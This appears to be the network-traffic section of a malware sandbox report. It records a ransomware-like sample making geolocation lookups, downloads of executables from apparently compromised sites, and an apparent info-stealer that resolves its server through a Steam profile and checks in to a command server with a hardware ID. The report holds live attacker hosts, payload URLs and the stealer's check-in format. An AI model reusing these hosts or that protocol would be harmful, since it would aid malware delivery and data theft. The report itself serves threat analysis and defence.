2024-05-25 19:29:37 UTC	893	IN	HTTP/1.1 200 OK Date: Sat, 25 May 2024 19:29:37 GMT Content-Type: application/json Transfer-Encoding: chunked Connection: close strict-transport-security: max-age=63072000; preload x-frame-options: SAMEORIGIN x-content-type-options: nosniff x-xss-protection: 1; mode=block; report=... access-control-allow-origin: * access-control-allow-methods: POST, GET, PUT, OPTIONS, PATCH, DELETE access-control-allow-headers: X-Accept-Charset,X-Accept,Content-Type CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cTtVoIrPRJg%2BFjrGzwJPwIxRnEWr5w2e%2Fgq8KdT93fpTnVhvCuCPGwd%2FmDYTL%2BYb9d6jJPcQZatoP5qRBzTlOBLEb47ozAHnvA%2FCFwon6STvlam1XpkG1rQKLGbD"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8897ef728ae8422b-EWR alt-svc: h3=":443"; ma=86400
2024-05-25 19:29:37 UTC	419	IN	Data Raw: 31 39 63 0d 0a 7b 22 69 70 22 3a 22 38 2e 34 36 2e 31 32 33 2e 31 37 35 22 2c 22 63 6f 75 6e 74 72 79 5f 63 6f 64 65 22 3a 22 55 53 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 73 74 61 74 65 73 20 6f 66 20 61 6d 65 72 69 63 61 22 2c 22 63 6f 75 6e 74 72 79 5f 72 75 73 22 3a 22 5c 75 30 34 32 31 5c 75 30 34 32 38 5c 75 30 34 31 30 22 2c 22 63 6f 75 6e 74 72 79 5f 75 61 22 3a 22 5c 75 30 34 32 31 5c 75 30 34 32 38 5c 75 30 34 31 30 22 2c 22 72 65 67 69 6f 6e 22 3a 22 4e 65 77 20 79 6f 72 6b 22 2c 22 72 65 67 69 6f 6e 5f 72 75 73 22 3a 22 5c 75 30 34 31 64 5c 75 30 34 34 63 5c 75 30 34 34 65 2d 5c 75 30 34 31 39 5c 75 30 34 33 65 5c 75 30 34 34 30 5c 75 30 34 33 61 22 2c 22 72 65 67 69 6f 6e 5f 75 61 22 3a 22 5c 75 30 34 31 64 5c 75 30 34 34 Data Ascii: 19c{"ip":"8.46.123.175","country_code":"US","country":"United states of america","country_rus":"\u0421\u0428\u0410","country_ua":"\u0421\u0428\u0410","region":"New york","region_rus":"\u041d\u044c\u044e-\u0419\u043e\u0440\u043a","region_ua":"\u041d\u044
2024-05-25 19:29:37 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49751	188.114.96.3	443	2764	C:\Users\user\AppData\Local\Temp\E609.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-25 19:29:40 UTC	85	OUT	GET /geo.json HTTP/1.1 User-Agent: Microsoft Internet Explorer Host: api.2ip.ua
2024-05-25 19:29:41 UTC	895	IN	HTTP/1.1 200 OK Date: Sat, 25 May 2024 19:29:41 GMT Content-Type: application/json Transfer-Encoding: chunked Connection: close strict-transport-security: max-age=63072000; preload x-frame-options: SAMEORIGIN x-content-type-options: nosniff x-xss-protection: 1; mode=block; report=... access-control-allow-origin: * access-control-allow-methods: POST, GET, PUT, OPTIONS, PATCH, DELETE access-control-allow-headers: X-Accept-Charset,X-Accept,Content-Type CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Hw09jiZJcDMGWjmbkMeVyR%2B0kMOaNkRNoozkhYW4NkR7Ni%2BVzj%2BQ%2Fj2KdywtwFJ3rOYiqtcHYA6CO7a3e%2BOIjuOcmBWz5YZuyWdLxyAKSeFDh0k4H6HtUZ%2BKrXDh"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8897ef862bda43dd-EWR alt-svc: h3=":443"; ma=86400
2024-05-25 19:29:41 UTC	419	IN	Data Raw: 31 39 63 0d 0a 7b 22 69 70 22 3a 22 38 2e 34 36 2e 31 32 33 2e 31 37 35 22 2c 22 63 6f 75 6e 74 72 79 5f 63 6f 64 65 22 3a 22 55 53 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 73 74 61 74 65 73 20 6f 66 20 61 6d 65 72 69 63 61 22 2c 22 63 6f 75 6e 74 72 79 5f 72 75 73 22 3a 22 5c 75 30 34 32 31 5c 75 30 34 32 38 5c 75 30 34 31 30 22 2c 22 63 6f 75 6e 74 72 79 5f 75 61 22 3a 22 5c 75 30 34 32 31 5c 75 30 34 32 38 5c 75 30 34 31 30 22 2c 22 72 65 67 69 6f 6e 22 3a 22 4e 65 77 20 79 6f 72 6b 22 2c 22 72 65 67 69 6f 6e 5f 72 75 73 22 3a 22 5c 75 30 34 31 64 5c 75 30 34 34 63 5c 75 30 34 34 65 2d 5c 75 30 34 31 39 5c 75 30 34 33 65 5c 75 30 34 34 30 5c 75 30 34 33 61 22 2c 22 72 65 67 69 6f 6e 5f 75 61 22 3a 22 5c 75 30 34 31 64 5c 75 30 34 34 Data Ascii: 19c{"ip":"8.46.123.175","country_code":"US","country":"United states of america","country_rus":"\u0421\u0428\u0410","country_ua":"\u0421\u0428\u0410","region":"New york","region_rus":"\u041d\u044c\u044e-\u0419\u043e\u0440\u043a","region_ua":"\u041d\u044
2024-05-25 19:29:41 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49755	188.114.96.3	443	5436	C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-25 19:29:42 UTC	85	OUT	GET /geo.json HTTP/1.1 User-Agent: Microsoft Internet Explorer Host: api.2ip.ua
2024-05-25 19:29:42 UTC	891	IN	HTTP/1.1 200 OK Date: Sat, 25 May 2024 19:29:42 GMT Content-Type: application/json Transfer-Encoding: chunked Connection: close strict-transport-security: max-age=63072000; preload x-frame-options: SAMEORIGIN x-content-type-options: nosniff x-xss-protection: 1; mode=block; report=... access-control-allow-origin: * access-control-allow-methods: POST, GET, PUT, OPTIONS, PATCH, DELETE access-control-allow-headers: X-Accept-Charset,X-Accept,Content-Type CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0Phs4rCFKiaDmF%2B3BGuLqeJ7kXDLOaUvRxMf9eBwtMXcVaVFluPCRlJGHxDf32FQ7G%2F7QTKX%2Bcyog%2FYCxuqyibVgVqtcvAM4PNxY0TdYQfyD88hya4KxRK3O2ntC"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8897ef901c710f70-EWR alt-svc: h3=":443"; ma=86400
2024-05-25 19:29:42 UTC	419	IN	Data Raw: 31 39 63 0d 0a 7b 22 69 70 22 3a 22 38 2e 34 36 2e 31 32 33 2e 31 37 35 22 2c 22 63 6f 75 6e 74 72 79 5f 63 6f 64 65 22 3a 22 55 53 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 73 74 61 74 65 73 20 6f 66 20 61 6d 65 72 69 63 61 22 2c 22 63 6f 75 6e 74 72 79 5f 72 75 73 22 3a 22 5c 75 30 34 32 31 5c 75 30 34 32 38 5c 75 30 34 31 30 22 2c 22 63 6f 75 6e 74 72 79 5f 75 61 22 3a 22 5c 75 30 34 32 31 5c 75 30 34 32 38 5c 75 30 34 31 30 22 2c 22 72 65 67 69 6f 6e 22 3a 22 4e 65 77 20 79 6f 72 6b 22 2c 22 72 65 67 69 6f 6e 5f 72 75 73 22 3a 22 5c 75 30 34 31 64 5c 75 30 34 34 63 5c 75 30 34 34 65 2d 5c 75 30 34 31 39 5c 75 30 34 33 65 5c 75 30 34 34 30 5c 75 30 34 33 61 22 2c 22 72 65 67 69 6f 6e 5f 75 61 22 3a 22 5c 75 30 34 31 64 5c 75 30 34 34 Data Ascii: 19c{"ip":"8.46.123.175","country_code":"US","country":"United states of america","country_rus":"\u0421\u0428\u0410","country_ua":"\u0421\u0428\u0410","region":"New york","region_rus":"\u041d\u044c\u044e-\u0419\u043e\u0440\u043a","region_ua":"\u041d\u044
2024-05-25 19:29:42 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.4	49756	103.174.152.66	443	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-25 19:29:43 UTC	170	OUT	GET /klok.exe HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Host: www.safeautomationbd.com
2024-05-25 19:29:44 UTC	396	IN	HTTP/1.1 404 Not Found Connection: close cache-control: private, no-cache, no-store, must-revalidate, max-age=0 pragma: no-cache content-type: text/html content-length: 708 date: Sat, 25 May 2024 19:29:44 GMT alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
2024-05-25 19:29:44 UTC	708	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, s

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.4	49762	104.102.42.29	443	5316	C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-25 19:29:46 UTC	119	OUT	GET /profiles/76561199689717899 HTTP/1.1 Host: steamcommunity.com Connection: Keep-Alive Cache-Control: no-cache
2024-05-25 19:29:46 UTC	1882	IN	HTTP/1.1 200 OK Server: nginx Content-Type: text/html; charset=UTF-8 Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.cloudflare.steamstatic.com/ https://cdn.cloudflare.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.cloudflare.steamstatic.com/ https://store.steampowered.com/ https://checkout.steampowered.com/ wss://community.steam-api.com/websocket/ https://api.steampowered.com/ https://login.steampowered.com/ https://help.steampowered.com/ https://steam.tv/ https://steamcommunity.com/ https://.valvesoftware.com https://.steambeta.net https://.discovery.beta.steamserver.net https://.steamcontent.com https://steambroadcast.akamaized.net https://steambroadcast-test.akamaized.net https://broadcast.st.dl.eccdnx.com https:// [TRUNCATED] Expires: Mon, 26 Jul 1997 05:00:00 GMT Cache-Control: no-cache Date: Sat, 25 May 2024 19:29:46 GMT Content-Length: 35682 Connection: close Set-Cookie: sessionid=037852c11ef0b5bf1badbbf2; Path=/; Secure; SameSite=None Set-Cookie: steamCountry=US%7C493458b59285f9aa948bf050e0c9a39b; Path=/; Secure; HttpOnly; SameSite=None
2024-05-25 19:29:46 UTC	14502	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 20 72 65 73 70 6f 6e 73 69 76 65 22 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 0d 0a 09 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 09 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 68 65 6d 65 2d 63 6f 6c 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 23 31 37 31 61 32 31 22 3e 0d 0a 09 09 3c Data Ascii: <!DOCTYPE html><html class=" responsive" lang="en"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta name="viewport" content="width=device-width,initial-scale=1"><meta name="theme-color" content="#171a21"><
2024-05-25 19:29:46 UTC	16384	IN	Data Raw: 6c 61 73 73 3d 22 73 75 62 6d 65 6e 75 69 74 65 6d 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 65 61 6d 63 6f 6d 6d 75 6e 69 74 79 2e 63 6f 6d 2f 64 69 73 63 75 73 73 69 6f 6e 73 2f 22 3e 0d 0a 09 09 09 09 09 09 09 44 69 73 63 75 73 73 69 6f 6e 73 09 09 09 09 09 09 09 09 09 09 09 09 09 3c 2f 61 3e 0d 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 73 75 62 6d 65 6e 75 69 74 65 6d 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 65 61 6d 63 6f 6d 6d 75 6e 69 74 79 2e 63 6f 6d 2f 77 6f 72 6b 73 68 6f 70 2f 22 3e 0d 0a 09 09 09 09 09 09 09 57 6f 72 6b 73 68 6f 70 09 09 09 09 09 09 09 09 09 09 09 09 09 3c 2f 61 3e 0d 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 3c 61 20 63 6c 61 73 73 3d 22 73 75 62 Data Ascii: lass="submenuitem" href="https://steamcommunity.com/discussions/">Discussions</a><a class="submenuitem" href="https://steamcommunity.com/workshop/">Workshop</a><a class="sub
2024-05-25 19:29:46 UTC	3768	IN	Data Raw: 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 72 6f 66 69 6c 65 5f 68 65 61 64 65 72 5f 62 61 64 67 65 69 6e 66 6f 5f 62 61 64 67 65 5f 61 72 65 61 22 3e 0d 0a 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 09 3c 61 20 64 61 74 61 2d 70 61 6e 65 6c 3d 22 7b 26 71 75 6f 74 3b 66 6f 63 75 73 61 62 6c 65 26 71 75 6f 74 3b 3a 74 72 75 65 2c 26 71 75 6f 74 3b 63 6c 69 63 6b 4f 6e 41 63 74 69 76 61 74 65 26 71 75 6f 74 3b 3a 74 72 75 65 7d 22 20 63 6c 61 73 73 3d 22 70 65 72 73 6f 6e 61 5f 6c 65 76 65 6c 5f 62 74 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 65 61 6d 63 6f 6d 6d 75 6e 69 74 79 2e 63 6f 6d 2f 70 72 6f 66 69 6c 65 73 2f 37 36 35 36 31 31 39 39 36 38 39 37 31 37 38 39 39 2f 62 61 64 67 65 73 22 3e 0d 0a 09 09 09 09 09 09 09 Data Ascii: <div class="profile_header_badgeinfo_badge_area"><a data-panel="{"focusable":true,"clickOnActivate":true}" class="persona_level_btn" href="https://steamcommunity.com/profiles/76561199689717899/badges">
2024-05-25 19:29:46 UTC	1028	IN	Data Raw: 20 74 68 69 73 20 77 65 62 73 69 74 65 20 69 73 20 70 72 6f 76 69 64 65 64 20 62 79 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 73 74 65 61 6d 63 6f 6d 6d 75 6e 69 74 79 2e 63 6f 6d 2f 6c 69 6e 6b 66 69 6c 74 65 72 2f 3f 75 3d 68 74 74 70 25 33 41 25 32 46 25 32 46 77 77 77 2e 67 65 6f 6e 61 6d 65 73 2e 6f 72 67 22 20 74 61 72 67 65 74 3d 22 5f 62 6c 61 6e 6b 22 20 72 65 6c 3d 22 20 6e 6f 6f 70 65 6e 65 72 22 3e 67 65 6f 6e 61 6d 65 73 2e 6f 72 67 3c 2f 61 3e 2e 09 09 09 09 09 3c 62 72 3e 0d 0a 09 09 09 09 09 09 09 09 09 09 09 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 76 61 6c 76 65 5f 6c 69 6e 6b 73 22 3e 0d 0a 09 09 09 09 09 09 09 3c 61 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 73 74 6f 72 65 2e 73 74 65 61 6d 70 6f 77 65 72 65 64 2e 63 6f 6d 2f Data Ascii: this website is provided by <a href="https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org" target="_blank" rel=" noopener">geonames.org</a>.<br><span class="valve_links"><a href="http://store.steampowered.com/

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.4	49765	65.109.242.59	443	5316	C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-25 19:29:47 UTC	186	OUT	GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0 Host: 65.109.242.59 Connection: Keep-Alive Cache-Control: no-cache
2024-05-25 19:29:48 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 25 May 2024 19:29:48 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-05-25 19:29:48 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.4	49768	65.109.242.59	443	5316	C:\Users\user\AppData\Local\100ceb86-6cb1-4744-a649-0782dee5c50c\build2.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-25 19:29:50 UTC	278	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----DBFHDBGIEBFIIDGCBFBK User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0 Host: 65.109.242.59 Content-Length: 278 Connection: Keep-Alive Cache-Control: no-cache
2024-05-25 19:29:50 UTC	278	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 44 42 46 48 44 42 47 49 45 42 46 49 49 44 47 43 42 46 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 32 35 33 34 44 42 35 37 35 43 36 43 31 31 38 30 30 38 36 39 32 2d 61 33 33 63 37 33 34 30 2d 36 31 63 61 2d 31 31 65 65 2d 38 63 31 38 2d 38 30 36 65 36 66 36 65 36 39 36 33 0d 0a 2d 2d 2d 2d 2d 2d 44 42 46 48 44 42 47 49 45 42 46 49 49 44 47 43 42 46 42 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 34 62 36 31 37 66 31 38 65 66 62 61 33 31 35 63 61 32 30 65 38 37 34 65 33 36 63 30 34 38 32 37 0d 0a 2d 2d 2d 2d 2d 2d 44 Data Ascii: ------DBFHDBGIEBFIIDGCBFBKContent-Disposition: form-data; name="hwid"2534DB575C6C118008692-a33c7340-61ca-11ee-8c18-806e6f6e6963------DBFHDBGIEBFIIDGCBFBKContent-Disposition: form-data; name="build_id"4b617f18efba315ca20e874e36c04827------D
2024-05-25 19:29:51 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Sat, 25 May 2024 19:29:51 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close
2024-05-25 19:29:51 UTC	69	IN	Data Raw: 33 61 0d 0a 31 7c 31 7c 31 7c 31 7c 32 33 62 39 37 35 37 63 35 31 61 35 37 31 30 34 39 39 61 37 39 65 65 62 38 62 31 61 30 31 34 65 7c 31 7c 31 7c 31 7c 30 7c 30 7c 35 30 30 30 30 7c 30 0d 0a 30 0d 0a 0d 0a Data Ascii: 3a1\|1\|1\|1\|23b9757c51a5710499a79eeb8b1a014e\|1\|1\|1\|0\|0\|50000\|00

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49772	188.114.96.3	443	3128	C:\Users\user\AppData\Local\1ce9cac5-3da6-4cd9-96d9-c6269c309230\E609.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-25 19:29:54 UTC	85	OUT	GET /geo.json HTTP/1.1 User-Agent: Microsoft Internet Explorer Host: api.2ip.ua
2024-05-25 19:29:54 UTC	897	IN	HTTP/1.1 200 OK Date: Sat, 25 May 2024 19:29:54 GMT Content-Type: application/json Transfer-Encoding: chunked Connection: close strict-transport-security: max-age=63072000; preload x-frame-options: SAMEORIGIN x-content-type-options: nosniff x-xss-protection: 1; mode=block; report=... access-control-allow-origin: * access-control-allow-methods: POST, GET, PUT, OPTIONS, PATCH, DELETE access-control-allow-headers: X-Accept-Charset,X-Accept,Content-Type CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KDKl3KGYwMFO%2FnovgSWFq%2BSe3yE%2B%2FqwKhV%2BzcleHI9g8y8fJsp8kbFTt5HCzQEzOmIhayNO9pEYaVOeLm17ARuOF5qfycqJEtXcxA%2B6nbe%2BjjR8hcsnFEt9rajdW"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8897efd9286732ca-EWR alt-svc: h3=":443"; ma=86400
2024-05-25 19:29:54 UTC	419	IN	Data Raw: 31 39 63 0d 0a 7b 22 69 70 22 3a 22 38 2e 34 36 2e 31 32 33 2e 31 37 35 22 2c 22 63 6f 75 6e 74 72 79 5f 63 6f 64 65 22 3a 22 55 53 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 73 74 61 74 65 73 20 6f 66 20 61 6d 65 72 69 63 61 22 2c 22 63 6f 75 6e 74 72 79 5f 72 75 73 22 3a 22 5c 75 30 34 32 31 5c 75 30 34 32 38 5c 75 30 34 31 30 22 2c 22 63 6f 75 6e 74 72 79 5f 75 61 22 3a 22 5c 75 30 34 32 31 5c 75 30 34 32 38 5c 75 30 34 31 30 22 2c 22 72 65 67 69 6f 6e 22 3a 22 4e 65 77 20 79 6f 72 6b 22 2c 22 72 65 67 69 6f 6e 5f 72 75 73 22 3a 22 5c 75 30 34 31 64 5c 75 30 34 34 63 5c 75 30 34 34 65 2d 5c 75 30 34 31 39 5c 75 30 34 33 65 5c 75 30 34 34 30 5c 75 30 34 33 61 22 2c 22 72 65 67 69 6f 6e 5f 75 61 22 3a 22 5c 75 30 34 31 64 5c 75 30 34 34 Data Ascii: 19c{"ip":"8.46.123.175","country_code":"US","country":"United states of america","country_rus":"\u0421\u0428\u0410","country_ua":"\u0421\u0428\u0410","region":"New york","region_rus":"\u041d\u044c\u044e-\u0419\u043e\u0440\u043a","region_ua":"\u041d\u044
2024-05-25 19:29:54 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.4	49773	192.185.16.114	443	2580	C:\Windows\explorer.exe

Timestamp	Bytes transferred	Direction	Data
2024-05-25 19:29:54 UTC	167	OUT	GET /TEMPradius.exe HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko Host: nessotechbd.com
2024-05-25 19:29:54 UTC	397	IN	HTTP/1.1 404 Not Found Date: Sat, 25 May 2024 19:29:54 GMT Server: Apache Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Link: <https://nessotechbd.com/wp-json/>; rel="https://api.w.org/" Upgrade: h2,h2c Connection: Upgrade Vary: Accept-Encoding X-Endurance-Cache-Level: 2 Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8
2024-05-25 19:29:54 UTC	7795	IN	Data Raw: 33 37 65 31 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0a 09 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 69 6e 67 62 61 63 6b 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 6e 65 73 73 6f 74 65 63 68 62 64 2e 63 6f 6d 2f 78 6d 6c 72 70 63 2e 70 68 70 22 20 2f 3e 0a 0a 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 09 09 64 6f 63 75 6d 65 6e 74 2e 64 6f 63 75 6d 65 6e 74 45 6c 65 6d 65 6e Data Ascii: 37e1<!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8" /><meta http-equiv="X-UA-Compatible" content="IE=edge"><link rel="pingback" href="https://nessotechbd.com/xmlrpc.php" /><script type="text/javascript">document.documentElemen
2024-05-25 19:29:54 UTC	6516	IN	Data Raw: 36 72 65 6d 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 73 68 61 64 6f 77 2d 2d 6e 61 74 75 72 61 6c 3a 20 36 70 78 20 36 70 78 20 39 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 30 2e 32 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 73 68 61 64 6f 77 2d 2d 64 65 65 70 3a 20 31 32 70 78 20 31 32 70 78 20 35 30 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 30 2e 34 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 73 68 61 64 6f 77 2d 2d 73 68 61 72 70 3a 20 36 70 78 20 36 70 78 20 30 70 78 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 30 2e 32 29 3b 2d 2d 77 70 2d 2d 70 72 65 73 65 74 2d 2d 73 68 61 64 6f 77 2d 2d 6f 75 74 6c 69 6e 65 64 3a 20 36 70 78 20 36 70 78 20 30 70 78 20 2d 33 70 78 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 Data Ascii: 6rem;--wp--preset--shadow--natural: 6px 6px 9px rgba(0, 0, 0, 0.2);--wp--preset--shadow--deep: 12px 12px 50px rgba(0, 0, 0, 0.4);--wp--preset--shadow--sharp: 6px 6px 0px rgba(0, 0, 0, 0.2);--wp--preset--shadow--outlined: 6px 6px 0px -3px rgba(255, 255, 25
2024-05-25 19:29:54 UTC	2	IN	Data Raw: 0d 0a Data Ascii:
